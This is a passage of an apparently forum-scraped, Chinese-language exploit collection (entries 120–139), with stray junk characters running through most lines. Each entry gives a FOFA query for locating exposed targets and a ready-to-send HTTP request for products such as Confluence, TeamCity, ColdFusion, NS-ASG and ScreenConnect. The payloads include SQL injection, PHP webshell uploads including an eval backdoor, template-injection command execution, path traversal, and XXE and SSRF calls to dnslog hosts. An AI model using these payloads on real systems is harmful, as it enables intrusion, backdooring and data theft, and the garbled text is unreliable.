X-Remote-Ip: 1.1.1.15 v+ g1 g) J/ W2 ^' k6 \
X-Remote-Addr: 1.1.1.1
8 N7 m( Q8 I1 STe: trailers$ f/ O5 f# `& a( l) O+ ~" E- D
Connection: close
' P, D$ N# F: t% j6 f) S1 f- U! j: f* ^+ j
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
$ K! O" b4 t* q; `7 v4 \1 a& d6 m3 `0 f$ h: P* Q
. P# q8 ^& ~: I* o
120. 北京百绰智能S40管理平台导入web.php任意文件上传
/ A- f$ Y& S9 k7 xCVE-2024-1253! w) D) t$ Q, \7 {' w6 k
FOFA:title="Smart管理平台"( O2 V- O! x1 L; m( @% V$ }7 i6 F
POST /useratte/web.php? HTTP/1.1
. Z+ Q' }* g# ?5 b |Host: ip:port
! t2 e1 g$ n! n' iCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db5 B7 c! ^' K3 [
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
/ f7 Q; b k, h# G4 Q* S% P& N RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- {3 Q7 `. g- }% HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" B# O' R# I* y4 G J4 ~5 y' MAccept-Encoding: gzip, deflate2 d. h0 C" E4 i
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
8 [4 @3 R8 i t; e4 U ]Content-Length: 597* I6 Y! Y; N" f+ k/ W
Origin: https://ip:port) `: Q( G# ` Y6 c
Referer: https://ip:port/sysmanage/licence.php
0 G0 `/ m9 w4 A+ }- |Upgrade-Insecure-Requests: 15 A! f" [9 g9 ?' C! }. J
Sec-Fetch-Dest: document
7 z" |" P) B# \4 A8 O, z- z7 d9 \0 ISec-Fetch-Mode: navigate
- @8 x% @/ B1 w: ZSec-Fetch-Site: same-origin
0 s5 q+ X6 x; V! q7 j+ PSec-Fetch-User: ?1/ ~( n0 u* B. T2 G! L3 M0 E
Te: trailers) G* }1 t( y/ r1 G$ j& {
Connection: close7 H& ^5 r% L4 o0 h6 `
9 o7 d; G! Z$ T/ q: ~-----------------------------42328904123665875270630079328
b% ^# L* D+ tContent-Disposition: form-data; name="file_upload"; filename="2.php"6 b% k( w+ E# u* n' O6 ?" W `
Content-Type: application/octet-stream
- W& ?6 y% O: m3 O8 B2 [( W; U$ r; ~
<?php phpinfo()?>
; U1 n8 C7 m8 c-----------------------------42328904123665875270630079328
& n/ k- C5 f1 b' \Content-Disposition: form-data; name="id_type"
5 k" s; x* B' P! V# S; e# Y; D" g; b, J
1
8 J4 o0 |0 B$ z-----------------------------42328904123665875270630079328
) X+ l$ h! Y4 g: SContent-Disposition: form-data; name="1_ck") P; K+ l6 T; d; e
1 s" \/ ?, r5 {! m! Q
1_radhttp
# m6 r" M5 u8 J5 G( A" D. j-----------------------------42328904123665875270630079328$ ~# [% p5 ]+ [
Content-Disposition: form-data; name="mode"9 I$ P' Q7 w) I
" P" H2 P8 u# L! F7 U
import$ g( Z) O" c, M' j
-----------------------------423289041236658752706300793289 W4 e3 B" ^3 V: f: h
, h, H+ ?) h J- F% i5 T
$ @- I; D; H7 U- Y文件路径/upload/2.php( ~/ w0 P# [4 _1 I
. q3 |" p6 S+ j. i/ H: m121. 北京百绰智能S42管理平台userattestation.php任意文件上传
5 m3 ]% |% r/ R. `* Y1 LCVE-2024-1918
* [ f: U; E+ R- bFOFA:title="Smart管理平台"
1 g7 Y7 @6 e' q+ QPOST /useratte/userattestation.php HTTP/1.1" Y0 E) S9 M1 Z5 v4 H
Host: 192.168.40.130:84433 }7 J; a' j/ E) @
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
% p8 C& M6 n0 J9 z: W# b( X3 a+ ?User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
, K( H# T! k/ A5 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 m' L( [4 m% k0 BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ K9 E2 o* Z9 `
Accept-Encoding: gzip, deflate9 d9 ]4 m; C" `9 U; a% j
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328# s o, ~- I0 _8 t1 c
Content-Length: 592
. k. u6 }; a! JOrigin: https://192.168.40.130:84433 y6 @. k9 B( z V& Q. F1 ~* z
Upgrade-Insecure-Requests: 1
/ h3 p; r) O+ Z) E/ u' `8 \9 T* l& t* ySec-Fetch-Dest: document! l `" u# V, `+ f* E+ k% Z% X, l
Sec-Fetch-Mode: navigate4 n& ]6 Q+ P1 a5 g0 V% c8 k
Sec-Fetch-Site: same-origin( j# l* F3 Y! J+ l9 T8 T. Z
Sec-Fetch-User: ?1
) t: M0 K* t" N- Q3 ]Te: trailers7 H1 m$ b$ A: T- s$ Q3 V; X$ p! G
Connection: close! S) K. y( z, L; h7 R( ~
* e& S2 l# S& d) q3 Y! K3 z; X
-----------------------------42328904123665875270630079328
0 p9 O! A5 c8 K. n YContent-Disposition: form-data; name="web_img"; filename="1.php"
5 @2 v: J2 F1 [& u2 yContent-Type: application/octet-stream
+ R9 O+ ?- l7 s" h, W' f9 @, `
6 M2 l0 e- U1 _1 U6 J<?php phpinfo();?>. ]& M, c7 a; i
-----------------------------423289041236658752706300793280 A9 X" f0 `, f$ Y$ T! I
Content-Disposition: form-data; name="id_type"* u) D- B( n) ]' c- n" L* c
+ L: a: j- g, {5 s( F
1
, h* x) C$ i; j7 |$ A-----------------------------42328904123665875270630079328
" N4 O) A& J m: [% M* d! TContent-Disposition: form-data; name="1_ck"5 k) M ^/ H$ M# [( c
: z* J4 r: @. Y3 L" M7 r
1_radhttp
I" J* ]. V. u) Y7 [- s5 O# e+ Y$ y-----------------------------423289041236658752706300793285 c" y! z+ G K7 x% h" T N
Content-Disposition: form-data; name="hidwel"
' m r- K2 O$ u9 ~+ e5 @; Q# Y: U3 ?3 k# ]
set" b& x5 q' R7 ?5 l% f( d
-----------------------------42328904123665875270630079328, E$ P. E4 Z2 J) c
. u6 F$ N( j) R3 R& W- S& y$ Z( P4 F% z* t9 ~
boot/web/upload/weblogo/1.php
+ w7 p' T5 X. K4 J- |
+ r0 s4 `' n% J- C1 {: j122. 北京百绰智能s200管理平台/importexport.php sql注入+ V9 L' D: d" G4 X: [
CVE-2024-27718FOFA:title="Smart管理平台"
+ Y: Q, M- |# R$ q9 D2 D2 m% @其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version() ?( n" i! l L4 b7 C/ J0 C
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
- Z6 U+ h+ t1 e4 IHost: x.x.x.x
3 w0 {, I& H( V+ a8 k c! z- q7 D O' FCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
. {; l3 E% E% k* x1 o+ TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0% |! v7 c; m0 E, @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; Q) m: X% q. ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 l$ j; O6 K- d' u2 Q
Accept-Encoding: gzip, deflate, br
+ b3 I; t. @; { c& O7 ]' n# KUpgrade-Insecure-Requests: 10 C1 n: T# R( }- G1 q, I9 _
Sec-Fetch-Dest: document7 M2 B, }* m9 q4 ?
Sec-Fetch-Mode: navigate
+ {2 m) i6 G$ vSec-Fetch-Site: none
9 D( [% p1 H1 O$ ESec-Fetch-User: ?15 K7 k' E0 c/ R% P7 y6 R; q
Te: trailers9 H7 q& c) ]" a. z/ I
Connection: close, T/ D4 Y" e& p3 }' u4 R4 J7 E
5 R- d- M' K( J! n( v3 T
2 |. T0 W& i) v7 q% h+ s+ r123. Atlassian Confluence 模板注入代码执行
6 v0 o$ Q( L [: a& ^# r' U% [) eFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
% D3 Q" L3 P3 V7 k' XPOST /template/aui/text-inline.vm HTTP/1.1# F1 G D: V! x8 r! Y4 Y
Host: localhost:8090, s; a/ F6 x$ @! Y. v* J* a
Accept-Encoding: gzip, deflate, br
; j# }( v8 r# p" g$ KAccept: */*9 l' r: Y, W) c$ ~# x* p1 r
Accept-Language: en-US;q=0.9,en;q=0.8
8 H1 H2 ]; G/ y: DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
- H3 }9 F2 E: e2 f9 E1 EConnection: close
$ {/ c/ ]1 s" I3 h d2 c& b) WContent-Type: application/x-www-form-urlencoded1 x0 ^; c* X6 D4 @; E5 R$ O
& e$ Y( ?( y3 w" c% f- |
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))2 ]! I5 Y& U% y. O. t E
0 X& g) h n6 K+ @! b
5 H+ y3 e6 O3 X& E124. 湖南建研工程质量检测系统任意文件上传
- C$ ?& Q9 ], I6 b2 kFOFA:body="/Content/Theme/Standard/webSite/login.css"
5 H: v- M4 n" B% IPOST /Scripts/admintool?type=updatefile HTTP/1.1( z$ [8 B1 R& @( _& x" k
Host: 192.168.40.130:8282
% c2 _9 M7 {" G ZUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
; z5 c2 J$ Y. O% @4 C( L" M9 lContent-Length: 72 G* O* S: q7 h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8) r% H, I3 I' p/ d% ^
Accept-Encoding: gzip, deflate, br, }* B! O0 W" b; ~; S# Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( d% J: J6 N/ I% SConnection: close# C- z. f& d# L X
Content-Type: application/x-www-form-urlencoded
! C7 @6 ~( Y% {: Y' h% `) T" D3 [5 v0 }& Z0 J9 Q$ N0 l
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
8 L. t$ I9 p! E$ ^5 M. X, k H5 a7 [$ ]& I2 N; C* ~/ ]
) O9 x0 e, M1 p4 w# Ehttp://192.168.40.130:8282/Scripts/abcgcg.aspx( A& X- M$ N3 j/ W
. j4 u$ ^6 s9 [
125. ConnectWise ScreenConnect身份验证绕过
6 x+ _9 B' n x/ d/ NCVE-2024-1709
" i) z- u( [, m) L1 I& ^+ i/ iFOFA:icon_hash="-82958153"4 N% j) C9 A1 g: {
https://github.com/watchtowrlabs ... bypass-add-user-poc
( G7 r0 Q+ a2 r1 Q5 {& u3 M% J" b0 a. c
9 p; R$ o( M; T# q使用方法; l( [5 l+ Q. {$ x! O- d
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
9 U. C, j9 {: P& ^8 {; C
S& S9 T) n+ j+ J2 j8 C% w- q( J( U" p7 ^) h) x
创建好用户后直接登录后台,可以执行系统命令。' o7 D) I! _- |
. U' K5 e2 C: v. X# L
126. Aiohttp 路径遍历8 p+ q7 Q' b8 z$ W4 N, R
FOFA:title=="ComfyUI"
+ c9 @ W1 k" p! ?( O7 l# \GET /static/../../../../../etc/passwd HTTP/1.1
# o1 @& y6 Q9 F9 _, \0 ]Host: x.x.x.x
2 x: \, H) ]0 P6 B1 U6 AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36) Y8 {# G7 }" O
Connection: close
1 N/ h8 M; }( b/ A! u; m% qAccept: */*
+ d% {7 c6 m {8 L. B+ _Accept-Language: en
! e+ `: H0 d1 Y- pAccept-Encoding: gzip: H/ ^% t& S. z% Z: e
" J# [1 s) a: _
j8 ^% ^ T; Z127. 广联达Linkworks DataExchange.ashx XXE
2 e( G) J* Y8 O. d. U( p. t- y5 RFOFA:body="Services/Identification/login.ashx"
& ?/ ^3 c* f' I FPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
1 `! F$ Z4 I4 C/ h' o' fHost: 192.168.40.130:8888
A+ h8 N7 q# @; y3 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
/ B4 ]; h) R! k L6 {Content-Length: 4158 B. b( D0 t) Y' \: x; Y+ ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# p) D5 r4 o2 ^& b/ D0 R' k
Accept-Encoding: gzip, deflate8 N$ ^( M) l) }6 q+ Z
Accept-Language: zh-CN,zh;q=0.9
4 O' p- t: w V6 \) D0 M% `7 ^) K. \4 EConnection: close0 Z8 w) i+ V" o& ~% ?
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0; g% ]. g' ~6 m( J" c
Purpose: prefetch
" o5 S1 p$ Q+ ?" ~Sec-Purpose: prefetch;prerender1 H5 {( z4 R0 D& ~( s* |% y
% l1 t" _6 [8 X# f------WebKitFormBoundaryJGgV5l5ta05yAIe0& T( t t, D3 b1 P E) L0 s; r6 [! Y
Content-Disposition: form-data;name="SystemName"' e0 R' W% k7 k1 i! h
- |8 |( X2 X; h9 P2 n9 I1 mBIM' @. m1 T/ ]8 q6 t
------WebKitFormBoundaryJGgV5l5ta05yAIe0
/ |' v% N$ N' l2 X3 F' H2 F( bContent-Disposition: form-data;name="Params"7 i- I8 Q6 F! n7 E C& H8 r$ a
Content-Type: text/plain
+ n5 Y. f' F7 g+ W: W' I1 p0 U, p2 \4 L9 ?8 S
<?xml version="1.0" encoding="UTF-8"?>, K1 K _$ Q/ @4 k N: [
<!DOCTYPE test [
& l- P/ m, S6 c9 Q# A) f<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">2 k7 ?# p0 w3 O8 z7 V
]
5 z* ~% q0 X5 r8 y7 j" ]$ t v" R>
% s7 R% O& S F* O3 T1 d<test>&t;</test>
( L+ ?7 r5 Q6 K& s7 J( e/ D- \ w------WebKitFormBoundaryJGgV5l5ta05yAIe0--
0 ^ T! k1 R) [, a% Z& Z* }& q! i) b; }* J! W2 {! _
5 T- `2 a6 C& h( @" x' l$ V. S
* | G' N+ \+ H' \ ?" g2 n128. Adobe ColdFusion 反序列化
. [/ i: L& b; V5 u4 [# KCVE-2023-382031 r- E" G* d$ ]7 \3 M. f% {" J W
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
4 t3 c. f! M' B+ G8 P9 b9 I# {FOFA:app="Adobe-ColdFusion", [- u: \8 ?+ @
PAYLOAD
+ x! t9 h5 F8 t6 d' s$ R/ l5 ?+ o' W
129. Adobe ColdFusion 任意文件读取- k1 I# b3 z) Z: a. U" Y. F, j3 b
CVE-2024-20767$ e8 [0 [1 E) {4 @2 B! F& P3 i
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request" @) Q3 t+ T& E( Z* l: t# F# [3 Y
第一步,获取uuid
! I1 b2 N4 A& T0 I) D6 TGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
/ H; \1 v: _) x( @2 R9 f, e5 OHost: x.x.x.x1 d- f/ F) t7 ?0 e* @ ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
- y0 h/ |& f1 S( s; I* k2 b" YAccept: */*" P% O, j! y0 y# G3 F
Accept-Encoding: gzip, deflate& y# {. Y, g7 }
Connection: close
3 b* n U4 ~; z! ^; `& v; y2 F3 I* V# `+ Q: ^; F s
8 ~+ \: j% Q$ C0 W& @
第二步,读取/etc/passwd文件) m5 b( {: u+ X3 j) d
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1( g. X6 ]1 t1 L+ t, N7 }$ y) t
Host: x.x.x.x/ Z# M) w4 d: o! m% f$ y; j4 i) l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.362 ~" V- ~# S* n1 Z* r6 x/ f2 q
Accept: */*4 r8 A! U! g |' K0 K* @
Accept-Encoding: gzip, deflate
7 |) a7 e( ~9 w9 t# @, eConnection: close
9 L# U3 s* N! }5 S$ b, p2 x2 `uuid: 85f60018-a654-4410-a783-f81cbd5000b9
( \5 E+ j& A' s( E3 `+ G. ?7 P; s( a/ J; ~/ A1 P k8 E
% P/ W8 b. P1 N, z130. Laykefu客服系统任意文件上传
x' a' ?% a% c, Q2 l' D6 ZFOFA:icon_hash="-334624619"
; |" N+ o$ k- a0 J. UPOST /admin/users/upavatar.html HTTP/1.1
: Y, E$ i* E/ g2 uHost: 127.0.0.1
" v8 R. A- [) g; v' G- u/ TAccept: application/json, text/javascript, */*; q=0.01
" {! X: E: C! J, [: u. V8 P# P3 YX-Requested-With: XMLHttpRequest8 |$ w! }$ O: S+ C9 K# w
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.267 \$ c+ |; K" k3 c V
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR4 b- u7 g2 W r0 Z& l6 D! M/ r3 P# x. ^
Accept-Encoding: gzip, deflate) G- g6 c1 ~' g* W4 R
Accept-Language: zh-CN,zh;q=0.98 {( I& d, t7 @! N/ k: |8 W
Cookie: user_name=1; user_id=3) n% D4 V2 H5 B/ G# _ x' @: {
Connection: close
8 Y- u% W) q. f# y/ ~' M. a# k; }; b. a) @
------WebKitFormBoundary3OCVBiwBVsNuB2kR
2 n2 R8 P3 _4 b) z/ W0 j0 a# [Content-Disposition: form-data; name="file"; filename="1.php"$ y. @1 _" Z: ^3 ~) f# j& U5 L- N
Content-Type: image/png; o: l: S! b2 \
. f$ n( h2 m9 s5 s! ^* z. s<?php phpinfo();@eval($_POST['sec']);?>" h' Z; c- \ ]# u6 K0 _
------WebKitFormBoundary3OCVBiwBVsNuB2kR--" y8 o$ Q; F/ d- X! e, `
) {+ @) w/ Z% p$ j0 Z4 `8 H5 x
. @4 r8 E9 R8 p% P; C9 j% [
131. Mini-Tmall <=20231017 SQL注入
( d2 ]- V8 _; y+ X" ^1 N4 [- OFOFA:icon_hash="-2087517259"$ [6 N& o2 ^4 e
后台地址:http://localhost:8080/tmall/admin- _6 ^) _8 ~) r
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
1 ?# J+ w4 H0 D! d2 v) g
: A5 w* x! y; I8 I$ \; \132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
% D ~) S# e, N4 X: a( P. bCVE-2024-27198( a$ j5 N, f4 [, u
FOFA:body="Log in to TeamCity"
% @2 v' O% ?1 ?; I3 y4 E }POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
3 k0 o0 k' k |) [) yHost: 192.168.40.130:8111
+ a5 p1 K. j- hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
; V* n: A# b& eAccept: */*
1 {* G1 W/ z2 q5 Q8 J) ~Content-Type: application/json
5 w9 [0 o2 Z8 o5 a0 w- e/ p0 FAccept-Encoding: gzip, deflate
1 ?5 f# W7 a/ I" i
a8 |4 y S9 W5 u" {{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}7 C' n$ q% A' k& A7 b
, v8 {8 Z, O7 j
; I2 i% d# Q7 b: z! W" [, b/ VCVE-2024-27199
% p! w2 H9 ?% b6 t( s* o/res/../admin/diagnostic.jsp9 }5 O8 l9 O( s' o/ W
/.well-known/acme-challenge/../../admin/diagnostic.jsp
4 t" A. r5 s+ T2 w `) P/update/../admin/diagnostic.jsp
# C# f2 s" h! ]8 c: }& \5 V% T: |$ U5 _
( q- O+ o1 G8 I( X' N. S
CVE-2024-27198-RCE.py
3 ?( y3 F# \ \( v
3 B0 a( d7 v% o& {133. H5 云商城 file.php 文件上传
. p0 C% t; e* K/ k+ PFOFA:body="/public/qbsp.php"2 C5 U' S! [3 b2 r( u0 x
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1& J# `; r( T- w
Host: your-ip
/ F0 }* \, p& i$ B, J6 u7 C% LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36( [- i% [! S& e, t5 E
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx; q, {# \7 Z" f* V4 T
X c, m, {3 ]' c4 d) |" L! f------WebKitFormBoundaryFQqYtrIWb8iBxUCx; I' w Z0 ^' S8 _7 [/ R: ?7 ~( @% N9 w
Content-Disposition: form-data; name="file"; filename="rce.php"
7 g: t# W8 m" T8 v" G" r$ }Content-Type: application/octet-stream3 p% X1 o& p; C7 A9 Q0 N
4 e( y1 g0 L7 i* @3 Z+ _! `
<?php system("cat /etc/passwd");unlink(__FILE__);?>
) I# q9 H0 h. K------WebKitFormBoundaryFQqYtrIWb8iBxUCx--% G& P/ g; J% S) @0 d% H H b
) C" J* }, [& O3 `, p
6 c6 N; t3 @+ `* k
# X% K# c4 [0 g$ j3 F134. 网康NS-ASG应用安全网关index.php sql注入
( B' p e6 h4 p' R9 [, J6 tCVE-2024-2330: D! w8 g c! z4 U1 h; w
Netentsec NS-ASG Application Security Gateway 6.3版本
' j! o r* g l m1 zFOFA:app="网康科技-NS-ASG安全网关"
. ~! Z3 v- e; }. c e; J) @* c6 mPOST /protocol/index.php HTTP/1.1
1 {7 e6 l+ T) eHost: x.x.x.x4 x$ C) T- C: q# L K3 d
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de% X% Y+ L r K7 ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
2 t0 y0 { y! R5 x* E/ f* w. Z) Q+ dAccept: */*- M& w% K$ v" O6 `" H% n' A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ o1 f N; A- n* L' i* ?# y C. Q/ QAccept-Encoding: gzip, deflate
7 M( I+ ^# b CSec-Fetch-Dest: empty
c# x1 }$ @* j* hSec-Fetch-Mode: cors) g: |+ s5 ~9 s R
Sec-Fetch-Site: same-origin
3 d, ]7 _; ^, D$ v5 k3 _* MTe: trailers( |9 A- u& C1 ?7 W, _7 ]
Connection: close
# o5 ~" h$ S3 QContent-Type: application/x-www-form-urlencoded
/ X$ P* S) j+ JContent-Length: 263
1 q, u4 Q( W9 t
( g0 l; X( s1 ~jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}- `! I- V* o9 x# Q' f" b; ~
8 c7 x' {3 ~1 u! N. {9 Y
. i1 w- F! n( c! ]' f8 |$ d7 I& h135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入4 m" l: `+ P) ]; g* e2 k( G
CVE-2024-2022' n0 h; y3 Z8 q5 ~# n# X+ Q; |
Netentsec NS-ASG Application Security Gateway 6.3版本
" @& n( A; d( Z5 ~* U3 ]FOFA:app="网康科技-NS-ASG安全网关"$ n; R! ~7 h4 n7 P( G
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1 o o6 Q7 M# o; ~5 ~( c/ A D
Host: x.x.x.x9 b+ P3 J, }5 r. w! l. J! p% p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.368 ]6 }4 }2 h/ v' } t! Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' @# {( t4 X* }4 j9 NAccept-Encoding: gzip, deflate
, M' ~9 p! y1 C! x3 W: pAccept-Language: zh-CN,zh;q=0.9, Y$ _3 l, m3 Z+ j$ D+ q/ `
Connection: close
+ u0 Y: ^7 L. G: y
$ E0 D" F. x) v5 `3 p
& j. J6 G9 X2 ~- Y, k" h7 G. t136. NextChat cors SSRF
9 C8 i1 H5 d2 t- n- A- ?CVE-2023-49785& j H; q; n5 C, {" W( c$ f$ m
FOFA:title="NextChat"
/ R8 K! [0 _0 w" @GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
+ Q; n# B2 x: M6 FHost: x.x.x.x:10000& g0 n( I5 i, C* G7 [- j
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 {. `- u* B+ `8 u+ Q% ^% ^Connection: close% t `$ F, D3 P8 [+ ?
Accept: */*7 t, `9 L/ }+ n) @" B6 j0 ^* W
Accept-Language: en# r2 X2 C# g' y! T
Accept-Encoding: gzip, \) }% T3 N& g3 F$ S% U
9 [% g- w# e# C2 f
! ^' f* d D$ W! f! s$ x) h137. 福建科立迅通信指挥调度平台down_file.php sql注入
% [3 m# M! D9 A% P% M- BCVE-2024-2620
0 l3 |2 B4 y# t5 G9 Z2 xFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
) w, K2 |( v5 L; a6 O# i, I) FGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1* Q9 ]6 H( j& Y3 [, y6 F
Host: x.x.x.x
6 B7 |' \- M, g# _/ s' ?7 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
! R% A+ F- J1 p+ B8 ]$ N% IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! J& _* B1 q7 n$ E1 j2 x/ qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; H) Q# X/ O; {Accept-Encoding: gzip, deflate, br3 P& d2 M x9 n/ H6 s, F1 H
Connection: close% I0 k2 `5 g) S) f3 _# A
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
0 U( m" u j/ A2 v5 uUpgrade-Insecure-Requests: 10 [+ c8 u( R ^
# k) B% W5 j P$ b# s) Y" H
$ n* c+ b; d# j6 E2 k. e) ?138. 福建科立讯通信指挥调度平台pwd_update.php sql注入" M* x# b1 ]) x9 v& L0 z: u
CVE-2024-2621. t. g r S5 i9 w8 d. h
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
2 K7 `. s$ m% _* cGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
/ R; J$ d( B; G; G' E& kHost: x.x.x.x5 @+ G& m" M* Z) l3 @* a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
7 `) Z0 X# }: {! [6 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
C( ~; a7 o4 q6 GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! x V+ H: X- g/ T! s9 yAccept-Encoding: gzip, deflate, br& r W3 t; M9 J9 C
Connection: close
$ T" ^/ p) p3 ~. vUpgrade-Insecure-Requests: 1
, I( O: N) U1 s7 |5 } r* U) t4 I/ e% Q% j9 A5 K
$ e' |. P/ K5 S3 H- p l: M139. 福建科立讯通信指挥调度平台editemedia.php sql注入9 V4 X( O6 z4 |4 F" B, \5 B
CVE-2024-2622
7 r1 K m" y" F/ m6 q! C- x8 \8 fFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"* W) m6 V2 m/ p2 q* q4 p$ J& M( f
